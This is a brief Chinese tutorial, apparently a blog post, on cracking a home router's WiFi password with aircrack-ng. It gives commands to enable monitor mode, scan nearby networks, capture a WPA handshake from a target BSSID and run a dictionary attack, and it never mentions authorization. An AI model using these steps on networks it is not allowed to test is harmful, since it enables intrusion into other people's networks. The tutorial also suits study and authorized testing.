WiFi密码破解:aircrack-ng
实验环境
路由器:普通家用路由器
无线网卡:一个免驱动的USB无线网卡
操作步骤
1.插入无线网卡
2.查看网卡名字:iwconfig
3.设置网卡为监听模式:airmon-ng start wlan0
网卡开启了监听模式之后网卡的名字就变为wlan0mon,以后的所有命令中的网卡名都是叫wlan0mon
4.扫描附近的WIFI:sudo airodump-ng wlan0mon,会显示附近所有的WIFI信号。
BSSID 代表路由器的MAC地址
PWR 代表信号的强度,数值越大代表信息越强
CH 代表信道
ENC 代表用的加密的方式
AUTH 代表认证的方式
ESSID 是WIFI的名字
5.开始抓包
airodump-ng -w tplink -c 1 --bssid 74:05:A5:9B:2E:DO wlan0mon
等到客户端连接WIFI的时候,就会抓取他们之间的握手认证包。
如果看到下面红色圈住的这些,就说明握手包抓取成功了,然后Ctrl+c停止抓包
6.解密:sudo aircrack-ng -w /home/hongke/pass.txt -b 74:05:A5:9B:2E:DO tplink-01.cap
在这里插入图片描述